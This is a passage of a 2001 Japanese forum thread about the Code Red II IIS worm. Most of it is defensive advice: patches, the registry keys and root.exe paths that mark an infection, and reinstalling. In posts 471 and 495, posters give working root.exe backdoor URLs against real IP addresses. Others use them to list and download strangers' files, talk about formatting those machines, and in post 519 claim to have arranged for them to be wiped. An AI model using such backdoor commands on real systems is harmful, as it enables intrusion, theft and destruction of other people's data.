334 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:45
>>331
もち社内だけね

335 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:45
そろそろ飽きてきたから、完全に消滅するか
面白い亜種をリリースするかどっちかにしろとか
思ってる俺は逝ったほうがいいかな?
土曜21時ぐらいが一番楽しかったんだが

336 :>>330:2001/08/08(水) 00:45
IndexServerとisapi殺しとけ

337 :ななしさん@カレーうまい:2001/08/08(水) 00:47
なんでみんなせっかく感染してるマシンをばらしちゃうかなぁ。
もったいないよ?

338 :管理部:2001/08/08(水) 00:48
>>331
それも考えたが、root.exeの場所を探すコード書くのは
意外と面倒だ。D:、E:あたりにInetPubがあるならまだしも、
M:とかQ:とかに配置してるような変態まで対処する気にはならん。

339 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:52
>>337
踏み台か、暗号コンテストにしか使えないマシンたちです。

340 :管理部:2001/08/08(水) 00:53
気が付いて速攻削除して知らんふり決め込んでる奴もいるしな。
気持ちはわからんでもないが、防衛できたマシンにはアタック
ログばっちり残ってるんだからさ。ムダムダ。

341 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:55
アタックされたログを公開するのって法的に問題ありますか?
エロ動画ダウソ速度が落ちてプソプソなので晒してやりたいのですが。

342 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:57
あの〜これってWIN2000とNTに感染するの?
っ〜うかマジでうぜえんだよ!!!!!

343 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:58
>>342
いっつ つー れいと。

344 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:58

★2chが常時IP取ってる証拠?★
http://kaba.2ch.net/news/kako/994/994154317.html

以下の情報を記録させていただきました。
http://usagi.tadaima.com/2chbbs/subback.html

345 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:58
これってポートアタック以外に感染するって事あるんですか?
80さえブロックすればイントラはOKなはずですよね?

346 :名無しさん@お腹いっぱい。:2001/08/08(水) 00:59
>>340
うちでは、ダイアルUP接続馬鹿が居て、そいつがLAN内に持ち込んだ
ようなんだが、退職者のサーバに電源いれてそれが原因かのように言ってる。
ウィルスじゃなくて、ワームなんだってことに気が付かない言い訳が、哀愁
を誘うなり。

347 :>:2001/08/08(水) 00:59
のんきだな
http://www.jwntug.or.jp/index-j.html
http://news01.jwntug.or.jp/openforum/index.html?ng=jwntug%2Eopenforum%2Ewindowsnt%2Esecurity

348 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:00
>>344
IPは公開するものだ。

349 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:01
AT&Tしっかりしてくれ。すさまじいアタック食らってんだよ

350 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:01
>>342 バックドアからやりたい放題だということはこの板を見れば
明白。未必の故意で捕まります。

351 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:03
>>346
人のせいにするやつ信用できない残念だけどクビ。

352 :管理部:2001/08/08(水) 01:03
同じ会社のような気がしてきたぞ(笑
収集できたログの発動時間からしてダイアルアップ経由感染と踏んでるぜ。

353 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:03
NT4はSRPを入れれば大丈夫みたいやね
http://www.microsoft.com/japan/technet/security/nt4srp.asp

354 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:04
>>350
誤爆?

355 :ななしさん:2001/08/08(水) 01:05
誰かそろそろ、全ネットワークがストップしたあのアホな会社を晒してくれ。

356 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:05
Win2kもproはデフォじゃ感染しないみたいだし、一般ユーザーは取り合えず安心ですね。

357 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:05
なんだかチャット状態ですね。

358 :もう:2001/08/08(水) 01:05
みんな見てくれよ〜ぶらくらじゃないから
http://www.nefty.net/desktop/haritsuke/imgboard.cgi

359 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:06
>>356
気が付かないうちに IIS インストールされてる Win2Kプロ
が沢山攻撃に参加してると思うのだが。

360 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:07
>>355
全サーバーWINで組むような駄目ネットワークは絶滅危惧種

361 :350:2001/08/08(水) 01:07
誤爆スマソ >>341 宛てでした

362 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:07
>>359
ちょっと不安になってきたんだけど、人のマシンに気づかれないようにIISインストなんてできるの?

363 :え〜ん:2001/08/08(水) 01:08
だからあ、コンピューターの管理でサービスとアプリケーションの
下になんかない?

364 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:09
>>362
くとうてんがちがうのであつた

365 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:10
>>355
どこどこ?

366 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:10
>>363
インデックスサーバーがありますね。
これが停止していればOKです。

367 :359:2001/08/08(水) 01:12
>>362
わかりにくくてスマソ。

IIS がインストールされていることに気が付いていない
Win2K Pro ユーザーが沢山いるだろうな、という意味。

368 :え〜ん:2001/08/08(水) 01:12
>>366
デフォルトで停止してる?

369 :管理部:2001/08/08(水) 01:13
>>366
停止しててもだめだよ。

370 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:14
>>366
違う!
index service 動いてる動いてないは関係ないぞ。

371 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:14
Win2kProってデフォルトじゃIISはインストールされないでしょ?
素人はサービス追加したり弄ったりしないだろうからまず大丈夫。
コンピュータの管理>サービスとアプリケーション>サービス>インデックスサービスが停止してれば問題なし。
これが開始になってると非常にまずい。

372 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:14
default.idaあるないですね。

373 :え〜ん:2001/08/08(水) 01:14
>>369
そうすよね!!
誰も気づいてくれないんだもの。

374 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:15
>>372
default.idaのパスは?

375 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:15
>>367
恥ずかしながら私がそうでした。
遅ればせながら対応しました。
無事でよかったけど・・・。

376 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:16
>>371
違うっつーのよ。いいかげんな情報流すな!

377 :え〜ん:2001/08/08(水) 01:16
だってan httpd立てようとした時「80は使われてます」って出たもの。

378 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:18
default.idaは無くてもidq.dllに渡されてしまうからだめ。
.idqと.idaに対するidq.dllへの割り付けを消してしまうかしないと。

379 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:18
もし感染してたとして
IISをアンインストールすればOK?

380 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:19
>>366
本当にOK? うちではインデックスサービスが停止していても、
DLLが残ってると入り込めるらしいという情報が流れているのだが。

381 :372:2001/08/08(水) 01:20
>>378
陳謝。

382 :管理部:2001/08/08(水) 01:20
>>379
おまえみたいな奴があとからあとから出てきてこっちの仕事は
停滞しっぱなしだ。

383 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:20
サービスとアプリケーションの下層にインデックスサービスがあるんですけど中身が空なら安全ですか?

384 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:20
idq.dllのリネームで済まないか?

385 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:21
>>379
とめとけばあんまり良くないけどひとまずOk。
ただしSystem File ProtectionがOffになったまま。

386 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:21
>>379
全然ダメ。

387 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:22
>>384
それならパッチ当てたほうがいい

388 :ななし:2001/08/08(水) 01:22
>>366
今回はこういう方達の大量感染なんで
どうにもならんでス。

                  /)
             、2)Y⌒  ⌒フ   +
           ッ-i'´       ⌒フ
           (´ ,.-゙ー-、     ろ、
        * シ彡ノ"ミVv    )
      *    ノノノノ"ヽヽヽミ   シ  / ̄ ̄ ̄ ̄ ̄
.          ,l')∩  ∩ |)|ヾ ミ  < 逝ってよし
           ,○)、 ▽  ノjl| YY゙    \_____
           {_∃ `l____/⌒'i|
            ̄ Yl"゙⌒lY |  +
              ,ト|__/ハ i、
           ,iニiニiニユ ゙h,,)
           ノtYTYヾ\
          /''フ''''ー<"ヽ、
           /__ノ     \ノヽ、
          (__)     ゞ__)

389 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:22
>>386
ありゃ、Backdoor到達できたっけ?

390 :管理部:2001/08/08(水) 01:23
>>384
ida/idqマッピング解除してScriptsを消せ。
実行権解除でもいいぜ。

391 :え〜ん:2001/08/08(水) 01:23
>>388
かわいい〜

392 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:24
結局、ごちゃごちゃいわずに手順どおりにやれってことになるわけだ。

393 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:26
>>390
なるほど、実行権は確かに楽だ。まあIISなんていう
ステキなHTTPDは触ったことも無いんで、実は関係無いんだが

394 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:27
ワームの削除方法:


1. 次のWebサイトから修正プログラムをダウンロードして入手し、適用します:

http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-033(日本語)

http://www.microsoft.com/technet/security/bulletin/MS01-033.asp(英語)

395 :え〜ん:2001/08/08(水) 01:27
これで一人減ったんでよかった。

-------ここまで読んだ---------
もう寝る。

396 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:28
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| あしたまでに全部駆除しといて。

   ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ∧_∧       / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ( ・∀・)  ∧ ∧ < もう、手詰まりです。
 (  ⊃ )  (゚Д゚;)  \____________
 ̄ ̄ ̄ ̄ ̄ (つ_つ__
 ̄ ̄ ̄日∇ ̄\| BIBLO |\
        ̄   =======  \

397 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:29
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

398 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:31
iij大丈夫か?、、、
もう10件も来てるぞ

399 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:31
いいかげんなこと言う前に >>1>>2 のリンク先は読んでくれよ...

400 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:31
そう言われるといいかげんなこと言いたくなるな

401 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:33
他のとこは勢い落ちてるのかな
俺んとこは、Win2kダイヤルアップOCNで
2時間半で230件ぐらい来てる。早く鎮まって欲しい・・・

402 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:34
>>397 うぉ、一気に書き換わってる。

403 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:35
>>397
普段の低姿勢が無くなって、ちょいちょいと怒りが現れているね。

404 :( ´∀`)さん:2001/08/08(水) 01:36
       / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
       |  IISが起こす昔からの騒動を見ていると        |
  ∩_∩  |                                |
 (´ー`) <  IIS自体がバックドアであるような気がするよ    |
 (   ) \____________________/
  | | | 
 (___)__)

405 :厨房:2001/08/08(水) 01:36
インデックスサービスってアンインストできるの?
サービスにIndexing Serviceっていう名前で入ってるんだけど、開始にはなってないが・・・

406 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:37
>>405

1に戻って以下読み直し。

407 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:38
>>397
でも HTTP のリクエストを攻撃パケットと呼ぶのは違和感ある...

408 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:39
>>405
できるけどしても意味ない

409 :厨房:2001/08/08(水) 01:42
>>406
一応過去ログは読んで、MSの修正プログラムをインストしたりして感染自体はしてないんですけどね、
Indexing Serviceのアンインストは過去ログにはなかったと思ったんですけど

>>408
意味無いの?やり方だけでも教えくれないかな・・・

410 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:43
>>409
390みてください。

411 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:42
http://www.symantec.com/region/jp/securitycheck/codered_secutitycheck.html
ここでチェックソフト落としてチェックしてみた。

your computer does not appear to be vulnerable to the codered warm
と出たけど、英語わからん・・・。
coderedに弱くない?問題ないって事でええんかのー。

412 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:44
いや〜出始めの頃に落とされて良かったよ>NNNNの頃

会社の社員が使っているIISマシン落ちてやんの。
SRP入れたから良いけど。

413 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:44
>>411
さいです

414 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:46
your computer does not appear to be vulnerable to the codered warm

アンタのPCにはCodeRedに対する脆弱性が見つからなかった

415 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:46
>>411
does notくらい読めるやろー

416 :名無しさん@お腹いっぱい。 :2001/08/08(水) 01:47
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

一部転載させてもらおう

>(Code Red II に)感染したホストについて は修正パッチを適用し再起動する(Code Redに対する対処)だけでは
>まったく 不十分であり、レジストリ値の変更等も必要になる。また、こうした対処を しても、既にバックド
>アを悪用された可能性もあり、システムの全面的かつ 徹底的なチェックが必須である。それが難しい場
>合は、全面的な再インストール を行なうことが強く推奨される。

417 :一発予想:2001/08/08(水) 01:53
次のターゲットは、やっぱりこれ?
http://www.zdnet.co.jp/news/0108/07/e_ie.html
#すまん、デマはよそう。

418 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:53
WIN2Kでインターネットにつないでしまった不幸なあなたに送る
バックドア検出ツール
http://localhost/scripts/root.exe?/c+net+send+localhost+やられてますよ

419 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:54
>>416のリンクが一番分かりやすい。
ここでごちゃごちゃいってる奴らははっきり言って要領を得ない。

420 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:54
ワラタ

421 :管理部:2001/08/08(水) 01:55
>>418
なるほどこりゃいいね。

422 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:55
そろそろ次の展開がほしーな
だれか殺虫剤ワーム作ってくれー
名前はアースレッドでよろしく

423 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:56
>>419
・・・みんな君に解説してる訳じゃないんでね

424 :名無しさん@お腹いっぱい。:2001/08/08(水) 01:57
まあ、誤解しがちな点が解決されたんではないか?
ましな情報源のをちゃんと読めという話は確かだが。

425 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:00
http://www.symantec.com/region/jp/sarcj/data/c/codered.v3.html

426 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:00
>>418 おお、いいんじゃないですか。
パート2立てるときは1に載っけといてよ。
# 「やられてますよ」って日本語じゃだめなんかな。

427 :411:2001/08/08(水) 01:59
>>414
サンクス!

>>411
すまん、よめんのだ!バカなのだー。
でも、こんなバカの管理してるサーバーが大丈夫なのに、感染してる
サーバーが多いのは信じられないなー。

428 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:01
まとめると
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\Scripts
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\msadc
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\c
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\d
のレジストリキーが存在、あるいは
c:\explorer.exe
d:\explorer.exe
c:\inetpub\scripts\root.exe
c:\Program Files\Common Files\System\MSADC\root.exe
が存在していれば感染。
タスクマネージャのプロセスにInetinfo.exeが存在(IISがインストール済且つ動作中)すればパッチを当てる必要有り。
パッチを当てるにはSP2インストール必要有り。

ってことでよろしいですね。

429 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:03
まとめてくれたのはありがたいんだが 15 分後には同じ質問が
出るよ、この回り具合だと。

430 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:03
>>418

http://localhost/scripts/root.exe?/c+net+send+localhost+やられてますよ
って感染してても表示されない気がする

431 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:04
>>428
万能backdoorありってことは、

・ログを消して(通用するのは休眠サーバだけだが)
・レジストリキーもそれなりに戻して、
・別のバックドア仕掛けてドロンジョ(古っ!!)

なんてことはないか?

432 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:04
厨房がUnixでWebサーバー立てる時代だからね

433 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:05
>>431
explore.exeなんて目立つ名前じゃないと発見少しは遅れるかな?

434 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:05
別のバックドア、トロイの危険性があるから
素人は素直に再インストールしろっての

435 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:07
さらにまとめるとWindows2000Pro.インストールしたまんまの状態ならIISは動作してないので問題なし。
不安ならバッチあてればなおよし。
Serverはデフォルトでバッチ当てる必要有り。

ってことでよろしいですね。

436 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:08
>>431
もちろんある。
rootkit の類を植えられてる可能性あるし、不安なら再インストール!
なのだが、厨房管理者はその辺神経質にならないから
問題なんだな。

437 :503:2001/08/08(水) 02:10
>>428 まさかとは思うが、MeでExplorer.exe削除する奴は居ないよな。
NTと2000のIISは注意だけど。

438 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:11
>>435
IIS 動作させちゃうアプリってあるんじゃなかったっけ?
FrontPage とかどうだっけ
あとは Visual InterDev とか

439 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:12
>>438
IISを動作させるアプリをまとめて、これ使ってる人要注意みたいな感じで喚起するといいかもしれませんね。

440 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:14
>>473
ワラタ
ってーかMeや98にも感染するの?

441 :非管理部:2001/08/08(水) 02:15
>>360
> 全サーバーWINで組むような駄目ネットワークは絶滅危惧種
だったら保護して増やさなきゃ。

442 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:15
>>440


443 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:15
>>441
隔離

444 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:16
NT = rootkit

445 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:17
>>441
TCP/IP禁止。全部NETBEUIに戻す。

446 :438:2001/08/08(水) 02:18
>>439
そうだね。うちは FrontPage とか無いので検証できないので、
知ってる人いたら教えてください。

とりあえず、>>435 は Win2KPro でもタスクマネージャで
確認、としておいたほうが良い気がする。

447 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:20
>>445
NetBeuiごしに感染するワームなかったか?
東急CATVで流行ったやつ。

448 :非管理部:2001/08/08(水) 02:21
一寸の赤虫にも五分の魂。

449 :418:2001/08/08(水) 02:21
>>430
あれをあそこにああいうふうにコピーして実験した結果は
OKだったけどそんな簡単なもんじゃないんだっけ?

450 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:22
うちのネットワークNetBeui禁止だよ。
何考えてんだか。

451 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:22
>>447
あいたたたた

452 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:24
>>450
ただただIPつなぐなというたわごとでした。マジレスすまん。以上。

453 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:25
>>446
そうですね。次スレ(あるのか?)の>>1にまとめましょう

454 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:33
ことあるごとに「Dialウプだめ」「RASだめ」と、ささやかな
我々の要望をうち砕く本社/親会社の情報システム部。
まさかCodeRedごときにやられたりはしませんよねぇ(w

さあ、CodeRedを見事に撃退した彼らの奮闘ぶりをたたえまくろう!

…ちゅう新スレをチクリ板に上げたいと思うが、どうよ?

455 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:34
>>454
どこどこ?

456 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:35
>>449
うちのだとlocalhostあてのnet sendは届かない。
 マシン名を指定すると届くけど。

457 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:36
漏れはユーザだが、けなすことより動かすことを考えようという気になった。
今日は寝るざんす。

458 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:36
>>454
CodeRedがらみのちくりスレは一つはあってもいいとおもう

459 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:37
>>457
管理者さんはエラいということざんす(人によるが)。でわ。

460 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:41
ありゃ?
24.49.*.*
なんてとこから来たよ。
210ばっかりだったのに。

461 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:42
 これで日本は(韓国も同じだが)サイバーテロ仕掛け
れば一発で御陀仏、お役所もマスコミも無力だと証明で
きたね。「ならず者国家」もブッシュ大統領も大喜びさ

462 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:48
>>461
遊びに使ってるのが殆どだからそれほどこまりまセーン。

463 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:51
やべ、210.91.32.2 の X 型から連続攻撃食らってる。
3秒間で連続23回+8秒後に最後の一回アクセスがあった。
こんなの初めて見るんだけど新種?

464 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:54
かなりアタックが来てますね・・・
うちはMacのWeb共有というへぼい自家鯖ですが。
ログを見てると数分に一回は来ます。
主に中国系のサーバを媒介としているようです。

465 :名無しさん@お腹いっぱい。:2001/08/08(水) 02:55
TCP Port6345に沢山おいでになってますが、何のバックドアやら。
昨日の昼はUDPだった。知ってもどうにもならんが。

466 :465:2001/08/08(水) 02:56
6346の間違い。

467 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:02
>>466
どこかで見たようなPort番号…
と思ったら、それgnutellaですよん。

468 :某CATVユーザー@お腹いっぱい。:2001/08/08(水) 03:03
某CATVユーザーなんですが、自分のプロバのサポートに、
警告対応メールよろしくと言っても返事ないです(T_T)
(zonealarm警告が多発しているのに)

469 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:05
hinet.net にはログを送った。

470 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:05
>>467
Thanks。
なんだ、たいしたモンじゃないな (藁
到って禁欲的にしか使用してないもんで・・・

471 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:09
http://210.219.128.95/scripts/root.exe?/c+dir+"f:\XXX"
えろいのばっかもってる

472 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:10
今なら、root.exeでWeb改竄して自己主張し放題なのだろうか。。。
宗政分離マンセー
KomeiRed

473 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:12
>>471
デリっておやり

474 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:14
うちの apache に攻撃にきてるワームの元 IP、jp domain だけ調べると
.ad.jp, .ne.jp, (常時接続ユーザっぽい)、
.co.jp ばかりで、
.gr.jp, ac.jp がほとんど無い。
貧乏人は今回はほとんど攻撃を受けなかったのだろう
大学はほとんど IIS 使ってないのかな。

475 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:14
>>471
入手したいが方法がわからん(藁

476 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:16
>>475
wwwrootにコピって
httpから落としたら?

477 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:17
>>471
D:\にも魅力的なファイル名がいっぱい

478 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:17
>>471
入手しようとしたがファイルでかすぎ。
というかアクセス集中してんのか (藁

479 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:17
>>474
東大のNTサーバはIISだよ。

480 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:18
旦那の知らないところで妻がもてあそばれているというヤツですな。

481 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:19
>>478
アクセスが集中してるっつーか、増殖に忙しいんでは?
っつーか、ヤメトケヨー。

482 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:20
むかつくからフォーマットかけようか
ntldrを削除か迷いますなぁ

483 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:20
謝罪と賠償を要求されるぞ(w

484 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:20
>>481 すまん、思わず手が出た (藁

485 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:20
>>478
得ろ画像サービスなんてそんなもんか・・・

486 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:21
>>483
つーか、CodeRedにやられる奴がそこまでするか?
しかもやられたのがエロ動画
泣き寝入りっしょ

487 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:22
何とか TERUMI 画像と置き換える方法を考え中...

488 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:22
Name: s210-219-128-95.thrunet.ne.kr
Address: 210.219.128.95

krだぞkr(w

489 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:23
>>479
そうか、やっぱ金持ち大学は違うな(藁

490 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:24
こいつSM好き?
金沢文子まであるよ

491 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:26
>>488
じゃ犯っちゃってOK?

492 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:26
>>486
まぁ、個人ユーザならそうかもしれんが、企業だったり
なんらかの団体が管理しているマシンだと要求されても
おかしくないと思われ。

企業はダメー、個人ならオケーってことではないので、念のため。

493 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:27
在韓日本人か?
それとも日本かぶれのチョン

494 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:27
火事場泥棒はヤメレ。マジデ。

495 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:27
http://61.18.152.229/scripts/root.exe?/c+dir+"c:\movie"

496 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:29
inetnum: 61.18.0.0 - 61.18.255.255
netname: HKCABLE-HK
descr: HK Cable TV Ltd
descr: Cable Multi-Media Services
country: HK
admin-c: AD23-AP
tech-c: AD23-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-HK-ICABLE
changed: hostmaster@apnic.net 20001213
source: APNIC

person: administrator dns
address: 12/F., Cable TV Tower,
address: 9 Hoi Shing Road,
address: Tsuen Wan,
address: N.T.,
address: HK
country: HK
phone: +852-2112-7516
fax-no: +852-2112-7977
e-mail: dnsadmin@cms.hkcable.com
nic-hdl: AD23-AP
mnt-by: MAINT-HK-ICABLE
changed: dnsadmin@cms.hkcable.com 20000811
source: APNIC

497 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:29
>>495
たいしたのがないんですが・・・

498 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:29
どう見ても個人鯖だな
例え企業でもエロ動画置いてある会社って・・・
ププッ

499 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:31
だからヤメレってば。ホントに。
感染を放置している側に責任がないとはいわんが、
バックドアを仕掛けられてしまうのはワームのせいで故意ではないだろ。
しかし、そのバックドアを利用して侵入するのは故意だろ。
その違いをよく認識スレ。

500 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:35
>>495
スキャンディスクによる修復フォルダの多いマシンやな(w

501 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:36
前スレよりモラルを維持してきたが、ここに来てアレになったようだ。

502 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:36
IISでFTPサーバーだけ動かしてるんだけど、これでも感染のおそれがあるの?
なるべくSP2当てたくないんだけど…。

503 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:37
はなからFTPだけだったら、問題ない。

504 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:38
うちの大学も犯されたらしい。
「本学の複数のコンピュータが侵入され…」だって。

http://www.jpcert.or.jp/

505 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:38
>>501 皆、エロに反応した (藁

506 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:38
ホントだな。この板にはそんなに厨房がおおいんか?
自ら「僕チャンバックドアを利用して他人のマシンを
覗いてマース!」って公言しているようなもんだろ。
キヲツケロヨ。

507 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:38
>>428

c:\Program Files\Common Files\System\MSADC\root.exe
には、なんにもなかったのですが、
c:\inetpub\scripts\root.exe
には、root.exeが存在していました。
感染しているのでしょうか?
パッチは当てているのですが。。。
すみません、教えてください。

508 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:39
感染後にFTPだけにするのは、仕込まれ後なんでアウトだけどってことで。

509 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:40
>>507
あぼーん対象です
頑張ってください

510 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:40
>>507
合掌です。

511 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:42
>>507
感染してます。すみやかに処置しましょう。
お大事に・・・

512 :507:2001/08/08(水) 03:42
うげ。馬路すか?
ちなみに、root.exeを削除するだけじゃ、駄目ですよね?
もしかして、インストールし直し? ドキドキ

513 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:43
2ヶ月ぐらい前のsadmindに気が付いてなかったとかなら笑えるかも。

514 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:45
>>512
まず回線切って、IISを無効にして、再起動しましょう。
とりあえずこれで、今以上の増殖と侵入は防げると思われ。

その後にココでも読んで、しっかり処置しましょう。
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

515 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:46
>>512 とりあえす名前欄に fusianasan と入れてみ。

516 :507:2001/08/08(水) 03:47
ゾーンアラームもいれたのに。。。時すでに遅し?

藁ってやってください。。。

517 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:47
>>513
あぁ、その可能性もあるねー。
>>507 は sadmind の可能性も考えたほうがいいと思われ。

518 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:51
全ネットワークが停止した会社か。
業界最大手の某社ですかね・・・

519 :名無しさん@お腹いっぱい。:2001/08/08(水) 03:51
皆さんお待たせ〜
>>471>>495のエロ鯖は次回リブート時に
system32以下ログもろとも吹っ飛びます。
